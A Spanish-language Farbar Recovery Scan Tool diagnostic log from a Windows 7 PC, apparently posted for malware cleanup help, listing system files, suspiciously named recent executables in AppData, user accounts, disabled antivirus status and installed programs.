2020-03-25 14:27 - 2016-09-02 09:16 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-console-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:02 - 000062464 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\appid.sys
2020-03-25 14:27 - 2016-09-02 09:02 - 000017920 _____ (Microsoft Corporation) C:\Windows\system32\appidcertstorecheck.exe
2020-03-25 14:27 - 2016-09-02 09:01 - 000064000 _____ (Microsoft Corporation) C:\Windows\system32\auditpol.exe
2020-03-25 14:27 - 2016-09-02 08:57 - 000296960 _____ (Microsoft Corporation) C:\Windows\system32\rstrui.exe
2020-03-25 14:27 - 2016-09-02 08:53 - 000112640 _____ (Microsoft Corporation) C:\Windows\system32\smss.exe
2020-03-25 14:27 - 2016-09-02 08:53 - 000050176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\auditpol.exe
2020-03-25 14:27 - 2016-09-02 08:53 - 000030720 _____ (Microsoft Corporation) C:\Windows\system32\lsass.exe
2020-03-25 14:27 - 2016-09-02 08:49 - 000036352 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptbase.dll
2020-03-25 14:27 - 2016-09-02 08:49 - 000025600 _____ (Microsoft Corporation) C:\Windows\SysWOW64\setup16.exe
2020-03-25 14:27 - 2016-09-02 08:49 - 000014336 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntvdm64.dll
2020-03-25 14:27 - 2016-09-02 08:49 - 000007680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\instnm.exe
2020-03-25 14:27 - 2016-09-02 08:49 - 000002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\user.exe
2020-03-25 14:27 - 2016-09-02 08:48 - 000006144 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-security-base-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 08:48 - 000004608 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-threadpool-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 08:48 - 000003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-xstate-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 08:48 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-util-l1-1-0.dll
2020-03-25 14:27 - 2016-06-06 10:50 - 000228864 _____ (Microsoft Corporation) C:\Windows\system32\wintrust.dll
2020-03-25 14:27 - 2016-06-06 10:50 - 000190976 _____ (Microsoft Corporation) C:\Windows\system32\cryptsvc.dll
2020-03-25 14:27 - 2016-06-06 10:50 - 000141824 _____ (Microsoft Corporation) C:\Windows\system32\cryptnet.dll
2020-03-25 14:27 - 2016-06-06 09:23 - 000179200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wintrust.dll
2020-03-25 14:27 - 2016-06-06 09:23 - 000145920 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptsvc.dll
2020-03-25 14:27 - 2016-06-06 09:23 - 000106496 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptnet.dll
2020-03-25 14:27 - 2016-05-12 11:14 - 000084992 _____ (Microsoft Corporation) C:\Windows\system32\asycfilt.dll
2020-03-25 14:27 - 2016-05-12 09:18 - 000090624 _____ (Microsoft Corporation) C:\Windows\SysWOW64\olepro32.dll
2020-03-25 14:27 - 2016-05-12 09:18 - 000067584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\asycfilt.dll
2020-03-25 14:27 - 2016-05-04 11:17 - 000504320 _____ (Microsoft Corporation) C:\Windows\system32\msihnd.dll
2020-03-25 14:27 - 2016-05-04 11:17 - 000337408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msihnd.dll
2020-03-25 14:27 - 2016-05-04 11:17 - 000025088 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msimsg.dll
2020-03-25 14:27 - 2016-05-04 11:17 - 000025088 _____ (Microsoft Corporation) C:\Windows\system32\msimsg.dll
2020-03-25 14:27 - 2016-05-04 11:16 - 000070144 _____ (Microsoft Corporation) C:\Windows\system32\appinfo.dll
2020-03-25 14:27 - 2016-05-04 08:55 - 000073216 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msiexec.exe
2020-03-25 14:27 - 2015-07-22 18:02 - 001390592 _____ (Microsoft Corporation) C:\Windows\system32\diagtrack.dll
2020-03-25 14:27 - 2015-07-22 18:02 - 000879104 _____ (Microsoft Corporation) C:\Windows\system32\tdh.dll
2020-03-25 14:27 - 2015-07-22 11:53 - 000635392 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tdh.dll
2020-03-25 14:27 - 2015-07-22 10:48 - 000041984 _____ (Microsoft Corporation) C:\Windows\system32\UtcResources.dll
2020-03-25 14:26 - 2016-03-16 12:50 - 000156672 _____ (Microsoft Corporation) C:\Windows\system32\mtxoci.dll
2020-03-25 14:26 - 2016-03-16 12:28 - 000176128 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msorcl32.dll
2020-03-25 14:26 - 2016-03-16 12:28 - 000111616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mtxoci.dll
2020-03-25 14:26 - 2015-12-16 08:38 - 000419928 _____ C:\Windows\SysWOW64\locale.nls
2020-03-25 14:26 - 2015-12-16 08:37 - 000419928 _____ C:\Windows\system32\locale.nls
2020-03-25 14:26 - 2015-10-29 11:50 - 000342016 _____ (Microsoft Corporation) C:\Windows\system32\apphelp.dll
2020-03-25 14:26 - 2015-10-29 11:50 - 000072192 _____ (Microsoft Corporation) C:\Windows\system32\aelupsvc.dll
2020-03-25 14:26 - 2015-10-29 11:50 - 000023552 _____ (Microsoft Corporation) C:\Windows\system32\sdbinst.exe
2020-03-25 14:26 - 2015-10-29 11:50 - 000006656 _____ (Microsoft Corporation) C:\Windows\system32\shimeng.dll
2020-03-25 14:26 - 2015-10-29 11:50 - 000005120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\shimeng.dll
2020-03-25 14:26 - 2015-10-29 11:49 - 000295936 _____ (Microsoft Corporation) C:\Windows\SysWOW64\apphelp.dll
2020-03-25 14:26 - 2015-10-29 11:49 - 000020992 _____ (Microsoft Corporation) C:\Windows\SysWOW64\sdbinst.exe
2020-03-25 14:26 - 2015-05-25 12:19 - 000113664 _____ (Microsoft Corporation) C:\Windows\system32\sechost.dll
2020-03-25 14:26 - 2015-05-25 12:18 - 000404992 _____ (Microsoft Corporation) C:\Windows\system32\tracerpt.exe
2020-03-25 14:26 - 2015-05-25 12:18 - 000104448 _____ (Microsoft Corporation) C:\Windows\system32\logman.exe
2020-03-25 14:26 - 2015-05-25 12:18 - 000047104 _____ (Microsoft Corporation) C:\Windows\system32\typeperf.exe
2020-03-25 14:26 - 2015-05-25 12:18 - 000043008 _____ (Microsoft Corporation) C:\Windows\system32\relog.exe
2020-03-25 14:26 - 2015-05-25 12:18 - 000019456 _____ (Microsoft Corporation) C:\Windows\system32\diskperf.exe
2020-03-25 14:26 - 2015-05-25 12:01 - 000092160 _____ (Microsoft Corporation) C:\Windows\SysWOW64\sechost.dll
2020-03-25 14:26 - 2015-05-25 12:00 - 000364544 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tracerpt.exe
2020-03-25 14:26 - 2015-05-25 12:00 - 000082944 _____ (Microsoft Corporation) C:\Windows\SysWOW64\logman.exe
2020-03-25 14:26 - 2015-05-25 12:00 - 000040448 _____ (Microsoft Corporation) C:\Windows\SysWOW64\typeperf.exe
2020-03-25 14:26 - 2015-05-25 12:00 - 000037888 _____ (Microsoft Corporation) C:\Windows\SysWOW64\relog.exe
2020-03-25 14:26 - 2015-05-25 12:00 - 000017408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\diskperf.exe
2020-03-25 14:25 - 2016-08-29 09:31 - 014183424 _____ (Microsoft Corporation) C:\Windows\system32\shell32.dll
2020-03-25 14:25 - 2016-08-29 09:31 - 001941504 _____ (Microsoft Corporation) C:\Windows\system32\authui.dll
2020-03-25 14:25 - 2016-08-29 09:31 - 001867776 _____ (Microsoft Corporation) C:\Windows\system32\ExplorerFrame.dll
2020-03-25 14:25 - 2016-08-29 09:12 - 012880384 _____ (Microsoft Corporation) C:\Windows\SysWOW64\shell32.dll
2020-03-25 14:25 - 2016-08-29 09:12 - 001806848 _____ (Microsoft Corporation) C:\Windows\SysWOW64\authui.dll
2020-03-25 14:25 - 2016-08-29 09:12 - 001499648 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ExplorerFrame.dll
2020-03-25 14:25 - 2016-08-29 09:04 - 003229696 _____ (Microsoft Corporation) C:\Windows\explorer.exe
2020-03-25 14:25 - 2016-08-29 08:55 - 002972672 _____ (Microsoft Corporation) C:\Windows\SysWOW64\explorer.exe
2020-03-25 14:25 - 2016-07-07 09:36 - 001896168 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\tcpip.sys
2020-03-25 14:25 - 2016-07-07 09:36 - 000377576 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\netio.sys
2020-03-25 14:25 - 2016-07-07 09:36 - 000287976 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\FWPKCLNT.SYS
2020-03-25 14:25 - 2016-07-07 09:08 - 000046080 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\tcpipreg.sys
2020-03-25 14:25 - 2016-07-01 09:31 - 000976896 _____ (Microsoft Corporation) C:\Windows\system32\inetcomm.dll
2020-03-25 14:25 - 2016-07-01 09:31 - 000084480 _____ (Microsoft Corporation) C:\Windows\system32\INETRES.dll
2020-03-25 14:25 - 2016-07-01 09:13 - 000741888 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcomm.dll
2020-03-25 14:25 - 2016-07-01 09:13 - 000084480 _____ (Microsoft Corporation) C:\Windows\SysWOW64\INETRES.dll
2020-03-25 14:25 - 2016-07-01 08:56 - 000464896 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\srv.sys
2020-03-25 14:25 - 2016-07-01 08:56 - 000405504 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\srv2.sys
2020-03-25 14:25 - 2016-07-01 08:56 - 000168960 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\srvnet.sys
2020-03-25 14:25 - 2016-03-09 13:00 - 000444416 _____ (Microsoft Corporation) C:\Windows\system32\winhttp.dll
2020-03-25 14:25 - 2016-03-09 13:00 - 000396800 _____ (Microsoft Corporation) C:\Windows\system32\webio.dll
2020-03-25 14:25 - 2016-03-09 12:40 - 000351744 _____ (Microsoft Corporation) C:\Windows\SysWOW64\winhttp.dll
2020-03-25 14:25 - 2016-03-09 12:40 - 000316416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\webio.dll
2020-03-25 14:25 - 2016-01-20 18:51 - 000073664 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\disk.sys
2020-03-25 14:25 - 2015-12-16 12:55 - 000069120 _____ (Microsoft Corporation) C:\Windows\system32\nlsbres.dll
2020-03-25 14:25 - 2015-12-16 12:53 - 000007168 _____ (Microsoft Corporation) C:\Windows\system32\KBDAZEL.DLL
2020-03-25 14:25 - 2015-12-16 12:53 - 000007168 _____ (Microsoft Corporation) C:\Windows\system32\KBDAZE.DLL
2020-03-25 14:25 - 2015-12-16 12:48 - 000007168 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KBDAZE.DLL
2020-03-25 14:25 - 2015-12-16 12:48 - 000006656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kbdgeoqw.dll
2020-03-25 14:25 - 2015-12-16 12:48 - 000006656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KBDAZEL.DLL
2020-03-25 14:25 - 2015-12-16 12:47 - 000069120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\nlsbres.dll
2020-03-25 14:25 - 2015-07-09 11:58 - 001632256 _____ (Microsoft Corporation) C:\Windows\system32\dwmcore.dll
2020-03-25 14:25 - 2015-07-09 11:58 - 000082944 _____ (Microsoft Corporation) C:\Windows\system32\dwmapi.dll
2020-03-25 14:25 - 2015-07-09 11:42 - 001372160 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dwmcore.dll
2020-03-25 14:25 - 2015-07-09 11:42 - 000067584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dwmapi.dll
2020-03-25 14:25 - 2015-04-10 21:19 - 000069888 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\stream.sys
2020-03-25 14:06 - 2016-03-09 12:54 - 000275456 _____ (Microsoft Corporation) C:\Windows\system32\InkEd.dll
2020-03-25 14:06 - 2016-03-09 12:34 - 000216064 _____ (Microsoft Corporation) C:\Windows\SysWOW64\InkEd.dll
2020-03-23 18:49 - 2020-03-25 19:30 - 000013779 _____ C:\Users\MARCO AVILA\Desktop\Nuevo documento de texto.txt
2020-03-12 21:11 - 2020-03-15 15:07 - 000004410 _____ C:\Users\MARCO AVILA\Desktop\Nuevo documento de texto (5).txt

==================== Un mes (modificado) ==================

(Si una entrada es incluida en el fixlist, el archivo/carpeta será eliminado/a.)

2020-03-26 18:54 - 2016-11-27 08:17 - 000000000 ____D C:\Users\MARCO AVILA\AppData\LocalLow\Mozilla
2020-03-26 18:44 - 2012-11-11 17:09 - 000000000 ____D C:\Users\MARCO AVILA\AppData\Local\CrashDumps
2020-03-26 18:41 - 2019-09-26 13:33 - 000000000 ____D C:\Program Files (x86)\TeamViewer
2020-03-26 18:40 - 2009-07-13 23:08 - 000000006 ____H C:\Windows\Tasks\SA.DAT
2020-03-26 18:27 - 2009-07-13 22:45 - 000025840 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2020-03-26 18:27 - 2009-07-13 22:45 - 000025840 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2020-03-26 17:16 - 2020-01-24 21:06 - 000000000 ____D C:\Users\MARCO AVILA\AppData\Roaming\DMCache
2020-03-26 16:55 - 2019-08-06 10:58 - 000000000 ___HD C:\Users\MARCO AVILA\Desktop\_SNAPDOC
2020-03-26 16:38 - 2009-12-01 16:37 - 000903192 _____ C:\Windows\system32\perfh00A.dat
2020-03-26 16:38 - 2009-12-01 16:37 - 000214886 _____ C:\Windows\system32\perfc00A.dat
2020-03-26 16:38 - 2009-07-13 23:13 - 002098432 _____ C:\Windows\system32\PerfStringBackup.INI
2020-03-26 16:38 - 2009-07-13 21:20 - 000000000 ____D C:\Windows\inf
2020-03-26 13:53 - 2019-02-16 20:05 - 000000000 ____D C:\Users\MARCO AVILA\Desktop\Nueva carpeta (2)
2020-03-26 11:34 - 2016-10-01 19:36 - 000002353 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Opera.lnk
2020-03-26 11:34 - 2013-05-07 17:40 - 000002232 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2020-03-26 11:34 - 2010-06-19 21:50 - 000001413 _____ C:\Users\MARCO AVILA\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
2020-03-25 23:01 - 2019-08-21 16:35 - 000910336 ___SH C:\Users\MARCO AVILA\Desktop\Thumbs.db
2020-03-25 22:19 - 2020-01-24 21:06 - 000000000 ____D C:\Users\MARCO AVILA\AppData\Roaming\IDM
2020-03-25 21:55 - 2016-03-17 00:20 - 000000000 ____D C:\Program Files\TAP-Windows
2020-03-25 20:36 - 2019-01-21 16:36 - 000005670 _____ C:\Users\MARCO AVILA\Desktop\Nuevo documento de texto (2).txt
2020-03-25 19:17 - 2016-10-23 11:39 - 000000000 ____D C:\Users\MARCO AVILA\AppData\Local\SquirrelTemp
2020-03-25 19:13 - 2010-07-11 15:44 - 002045382 _____ C:\Windows\SysWOW64\PerfStringBackup.INI
2020-03-25 16:09 - 2018-11-06 18:43 - 000000000 ____D C:\ProgramData\Malwarebytes
2020-03-25 15:43 - 2010-10-16 20:06 - 000000000 ____D C:\Users\MARCO AVILA\AppData\Local\ElevatedDiagnostics
2020-03-25 15:20 - 2009-07-13 22:45 - 000592696 _____ C:\Windows\system32\FNTCACHE.DAT
2020-03-25 14:41 - 2009-10-28 12:41 - 000000000 ____D C:\Windows\ShellNew
2020-03-25 14:41 - 2009-07-13 21:20 - 000000000 ____D C:\Windows\PolicyDefinitions
2020-03-25 00:40 - 2010-06-19 21:49 - 000000000 ____D C:\Users\MARCO AVILA
2020-03-25 00:38 - 2019-07-18 13:46 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CCleaner
2020-03-25 00:38 - 2018-11-06 17:05 - 000000000 ____D C:\Users\Administrador.MAAH-PC
2020-03-25 00:38 - 2017-12-03 12:49 - 000000000 ____D C:\Program Files\CCleaner
2020-03-25 00:37 - 2009-07-13 21:20 - 000000000 ____D C:\Windows\registration
2020-03-24 22:14 - 2011-12-31 01:46 - 000000000 ____D C:\Temp
2020-03-22 02:21 - 2010-09-01 20:43 - 000024576 _____ C:\Users\MARCO AVILA\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2020-03-21 20:57 - 2017-10-19 11:28 - 000000000 _____ C:\end
2020-03-21 01:10 - 2019-03-24 22:24 - 000000000 ____D C:\Users\MARCO AVILA\Desktop\Nueva carpeta (3)
2020-03-20 17:21 - 2013-05-07 17:33 - 000003536 _____ C:\Windows\system32\Tasks\GoogleUpdateTaskMachineUA
2020-03-20 17:21 - 2013-05-07 17:33 - 000003408 _____ C:\Windows\system32\Tasks\GoogleUpdateTaskMachineCore
2020-03-20 02:22 - 2009-12-01 07:55 - 000000000 ____D C:\ProgramData\Temp
2020-03-13 20:41 - 2017-05-21 00:20 - 000000000 ____D C:\KMPlayer
2020-03-13 09:29 - 2013-01-30 15:04 - 000000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2020-03-12 13:02 - 2015-05-15 05:54 - 000000000 ____D C:\Program Files (x86)\Mozilla Firefox
2020-02-25 11:56 - 2009-07-13 23:08 - 000032518 _____ C:\Windows\Tasks\SCHEDLGU.TXT

==================== Archivos en la raíz de algunos directorios ========

2009-10-28 21:38 - 2009-02-10 13:23 - 000192484 _____ () C:\Program Files (x86)\Common Files\Acer GameZone online.ico
2011-09-12 13:38 - 2012-12-13 00:53 - 000000121 _____ () C:\Users\MARCO AVILA\AppData\Roaming\Camdata.ini
2011-09-12 13:38 - 2012-12-13 00:53 - 000000408 _____ () C:\Users\MARCO AVILA\AppData\Roaming\CamLayout.ini
2011-09-12 13:38 - 2012-12-13 00:53 - 000000408 _____ () C:\Users\MARCO AVILA\AppData\Roaming\CamShapes.ini
2011-09-12 13:37 - 2012-12-13 00:52 - 000004416 _____ () C:\Users\MARCO AVILA\AppData\Roaming\CamStudio.cfg
2010-08-29 00:04 - 2013-01-28 20:11 - 000000153 _____ () C:\Users\MARCO AVILA\AppData\Roaming\default.rss
2010-08-29 00:04 - 2010-08-29 00:04 - 000000000 _____ () C:\Users\MARCO AVILA\AppData\Roaming\downloads.m3u
2019-09-21 23:40 - 2019-09-21 23:47 - 000002459 _____ () C:\Users\MARCO AVILA\AppData\Roaming\droid4xinstaller.log
2020-03-26 11:39 - 2020-03-26 11:39 - 001927680 _____ (Filipe Lourenço                                             ) C:\Users\MARCO AVILA\AppData\Roaming\ergfeefvg.exe
2014-03-13 22:31 - 2014-03-13 22:31 - 000000099 _____ () C:\Users\MARCO AVILA\AppData\Roaming\history.Excel.pwcdat
2019-06-16 01:13 - 2019-06-16 01:36 - 000000556 _____ () C:\Users\MARCO AVILA\AppData\Roaming\koukou.ini
2015-06-03 21:12 - 2015-06-03 21:12 - 000000000 _____ () C:\Users\MARCO AVILA\AppData\Roaming\ProXoft
2020-03-26 11:38 - 2020-03-26 11:39 - 002134016 _____ (Akeo Consulting) C:\Users\MARCO AVILA\AppData\Roaming\rgfwedwsax.exe
2020-03-26 11:39 - 2020-03-26 11:39 - 002300416 _____ () C:\Users\MARCO AVILA\AppData\Roaming\rvfecdxs.exe
2010-09-26 17:44 - 2010-09-26 17:44 - 000002355 _____ () C:\Users\MARCO AVILA\AppData\Roaming\SAS7_000.DAT
2015-11-15 20:33 - 2015-11-15 20:33 - 000001181 _____ () C:\Users\MARCO AVILA\AppData\Roaming\trace_FilterInstaller.txt
2015-11-15 20:33 - 2015-11-15 20:33 - 000000000 _____ () C:\Users\MARCO AVILA\AppData\Roaming\trace_FilterInstaller.txt-CRT.txt
2012-01-11 00:27 - 2012-01-11 00:27 - 000037346 _____ () C:\Users\MARCO AVILA\AppData\Roaming\Valores separados por comas (DOS).ADR
2017-12-03 12:59 - 2017-12-03 12:59 - 000000000 _____ () C:\Users\MARCO AVILA\AppData\Roaming\wklnhst.dat
2020-03-26 11:33 - 2020-03-26 11:33 - 008509952 _____ () C:\Users\MARCO AVILA\AppData\Local\agent.dat
2020-03-26 11:32 - 2020-03-26 11:32 - 000045056 _____ () C:\Users\MARCO AVILA\AppData\Local\ApplicationHosting.dat
2020-03-26 11:33 - 2020-03-26 11:33 - 000069888 _____ () C:\Users\MARCO AVILA\AppData\Local\Config.xml
2010-09-01 20:43 - 2020-03-22 02:21 - 000024576 _____ () C:\Users\MARCO AVILA\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2013-04-19 15:25 - 2013-04-19 15:25 - 000118823 _____ () C:\Users\MARCO AVILA\AppData\Local\debuggee.mdmp
2012-02-28 14:05 - 2012-02-28 14:05 - 000000099 _____ () C:\Users\MARCO AVILA\AppData\Local\fusioncache.dat
2020-03-26 11:31 - 2020-03-26 11:32 - 000016368 _____ () C:\Users\MARCO AVILA\AppData\Local\InstallationConfiguration.xml
2020-03-26 11:31 - 2020-03-26 11:31 - 000142336 _____ () C:\Users\MARCO AVILA\AppData\Local\installer.dat
2020-03-26 11:32 - 2020-03-26 11:32 - 000126464 _____ () C:\Users\MARCO AVILA\AppData\Local\lobby.dat
2020-03-26 11:33 - 2020-03-26 11:33 - 000018432 _____ () C:\Users\MARCO AVILA\AppData\Local\Main.dat
2020-03-26 11:32 - 2020-03-26 11:33 - 000005568 _____ () C:\Users\MARCO AVILA\AppData\Local\md.xml
2020-03-26 11:33 - 2020-03-26 11:33 - 000126464 _____ () C:\Users\MARCO AVILA\AppData\Local\noah.dat
2020-03-26 11:33 - 2020-03-26 11:29 - 004667392 _____ () C:\Users\MARCO AVILA\AppData\Local\Plustech.exe
2020-03-26 11:33 - 2020-03-26 11:33 - 002160819 _____ () C:\Users\MARCO AVILA\AppData\Local\Plustech.tst
2017-04-03 16:12 - 2017-04-03 16:12 - 000002594 _____ () C:\Users\MARCO AVILA\AppData\Local\recently-used.xbel
2010-12-05 00:07 - 2018-11-04 19:36 - 000007661 _____ () C:\Users\MARCO AVILA\AppData\Local\Resmon.ResmonCfg
2020-03-26 11:33 - 2020-03-26 11:33 - 001895382 _____ () C:\Users\MARCO AVILA\AppData\Local\Suntech.bin
2020-03-26 11:32 - 2020-03-26 11:29 - 004667392 _____ () C:\Users\MARCO AVILA\AppData\Local\Techsing.exe
2020-03-26 11:32 - 2020-03-26 11:32 - 000068474 _____ () C:\Users\MARCO AVILA\AppData\Local\Techsing.tst
2020-03-26 11:34 - 2020-03-26 11:34 - 000032038 _____ () C:\Users\MARCO AVILA\AppData\Local\uninstall_temp.ico
2012-01-25 14:06 - 2012-01-25 14:06 - 000017408 _____ () C:\Users\MARCO AVILA\AppData\Local\WebpageIcons.db

==================== SigCheck ============================

(No existe una corrección automática para los archivos que no pasan la verificación.)


LastRegBack: 2020-03-19 13:04
==================== Final de FRST.txt ========================
Resultados del Análisis Adicional de Farbar Recovery Scan Tool (x64) Versión: 26-03-2020
Ejecutado por MARCO AVILA (26-03-2020 18:55:23)
Ejecutado desde C:\Users\MARCO AVILA\Desktop
Windows 7 Home Premium Service Pack 1 (X64) (2010-06-20 03:49:32)
Modo de Inicio: Normal
==========================================================


==================== Cuentas: =============================

Administrador (S-1-5-21-1649130365-987012723-906343211-500 - Administrator - Disabled) => C:\Users\Administrador.MAAH-PC
ASPNET (S-1-5-21-1649130365-987012723-906343211-1015 - Limited - Enabled)
HomeGroupUser$ (S-1-5-21-1649130365-987012723-906343211-1020 - Limited - Enabled)
Invitado (S-1-5-21-1649130365-987012723-906343211-501 - Limited - Disabled)
MARCO AVILA (S-1-5-21-1649130365-987012723-906343211-1000 - Administrator - Enabled) => C:\Users\MARCO AVILA

==================== Centro de Seguridad ========================

(Si una entrada es incluida en el fixlist, será eliminada.)

AS: Malwarebytes (Disabled - Up to date) {98619B37-4FC4-67F2-1C99-EEF6D47DBD96}
AS: Windows Defender (Disabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Programas instalados ======================

(Solo los programas de adware con indicador "Oculto", pueden ser añadidos al fixlist para hacerlos visibles. Los programas adware deben ser desinstalados manualmente.)

64 Bit HP CIO Components Installer (HKLM\...\{55D55008-E5F6-47D6-B16F-B2A40D4D145F}) (Version: 6.2.1 - Hewlett-Packard) Hidden
7-Zip 9.20 (x64 edition) (HKLM\...\{23170F69-40C1-2702-0920-000001000000}) (Version: 9.20.00.0 - Igor Pavlov)
Acer Backup Manager (HKLM-x32\...\InstallShield_{72B776E5-4530-4C4B-9453-751DF87D9D93}) (Version: 2.0.0.29 - NewTech Infosystems)
Acer Crystal Eye webcam Ver:1.1.124.1120 (HKLM-x32\...\{D0ACE89D-EC7F-470F-80BE-4C98ED366B32}) (Version: 1.1.124.1120 - Chicony Electronics Co.,Ltd.)
Acer eRecovery Management (HKLM-x32\...\{7F811A54-5A09-4579-90E1-C93498E230D9}) (Version: 4.05.3005 - Acer Incorporated)
Acer GameZone Console (HKLM-x32\...\{8ed9688e-4f79-4308-91ca-f1c37ca142b4}_is1) (Version: 5.1.0.2 - Oberon Media, Inc.)
Acer GridVista (HKLM-x32\...\GridVista) (Version: 3.01.0730 - Acer Inc.)
Acer PowerSmart Manager (HKLM-x32\...\{3DB0448D-AD82-4923-B305-D001E521A964}) (Version: 4.07.3008 - Acer Incorporated)
Acer Registration (HKLM-x32\...\Acer Registration) (Version: 1.02.3006 - Acer Incorporated)
Acer ScreenSaver (HKLM-x32\...\Acer Screensaver) (Version: 1.1.0715 - Acer Incorporated)
Acer VCM (HKLM-x32\...\{047F790A-7A2A-4B6A-AD02-38092BA63DAC}) (Version: 4.05.3000 - Acer Incorporated)
Acrobat.com (HKLM-x32\...\{287ECFA4-719A-2143-A09B-D6A12DE54E40}) (Version: 1.6.65 - Adobe Systems Incorporated)
Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 2.5.1.17730 - Adobe Systems Inc.)
Adobe Flash Player 23 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 23.0.0.205 - Adobe Systems Incorporated)
Adobe Flash Player 32 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 32.0.0.255 - Adobe)
Adobe Shockwave Player 12.0 (HKLM-x32\...\Adobe Shockwave Player) (Version: 12.0.2.122 - Adobe Systems, Inc.)
Advanced Archive Password Recovery (HKU\S-1-5-21-1649130365-987012723-906343211-1000\...\Advanced Archive Password Recovery) (Version: 4.50 - ElcomSoft Co. Ltd.)
Advanced Office Password Recovery (HKLM-x32\...\{867A00F3-027A-4946-8CE2-F77FEBCD1BA8}) (Version: 5.2.498.423 - Elcomsoft Co. Ltd.)
Advanced PDF Password Recovery (HKU\S-1-5-21-1649130365-987012723-906343211-1000\...\Advanced PDF Password Recovery) (Version: 5.0 - ElcomSoft Co. Ltd.)
Advanced RAR Password Recovery (remove only) (HKLM-x32\...\Advanced RAR Password Recovery) (Version:  - )
Advanced RAR Repair v1.2 (HKLM-x32\...\Advanced RAR Repair v1.2) (Version:  - )
Advanced VBA Password Recovery PRO (HKLM-x32\...\Advanced VBA Password Recovery PRO) (Version:  - )
Advanced ZIP Password Recovery (remove only) (HKLM-x32\...\Advanced ZIP Password Recovery) (Version:  - )
Aimersoft Helper Compact 2.5.2 (HKLM-x32\...\{405147F7-FCC5-499B-A27E-EA6BD4A80435}_is1) (Version: 2.5.2 - Aimersoft)
Alice Greenfingers (HKLM-x32\...\{82C36957-D2B8-4EF2-B88C-5FA03AA848C7-112920767}) (Version:  - Oberon Media)
Amazonia (HKLM-x32\...\{82C36957-D2B8-4EF2-B88C-5FA03AA848C7-11273477}) (Version:  - Oberon Media)
AndreaMosaic 3.33.0 (HKLM-x32\...\AndreaMosaic) (Version:  - )
Apple Application Support (HKLM-x32\...\{A83279FD-CA4B-4206-9535-90974DE76654}) (Version: 2.1.5 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.)
Archivos auxiliares de instalación de Microsoft SQL Server 2008 (HKLM\...\{A639F412-1C05-4DCB-BF41-AD122A09E79C}) (Version: 10.2.4000.0 - Microsoft Corporation)
Ares 2.1.7 (HKLM-x32\...\Ares) (Version: 2.1.7-Build#3041 - Ares Development Group)
Ashampoo Burning Studio 8.02 (HKLM-x32\...\Ashampoo Burning Studio 8_is1) (Version: 8.0.2 - ashampoo GmbH & Co. KG)
Ashampoo Snap 8 (HKLM-x32\...\{C92AB6F1-3B65-B79C-9019-8640F02B7C58}_is1) (Version: 8.0.7 - Ashampoo GmbH & Co. KG)
Asistente Infinitum (HKLM-x32\...\{BD1806A5-1B46-4DDC-A0B6-5F4D48022C78}) (Version: 1.7.0 - Fine Point Technologies, Inc.)
ASOFARMA (HKLM-x32\...\Vademecum IPE_is1) (Version:  - )
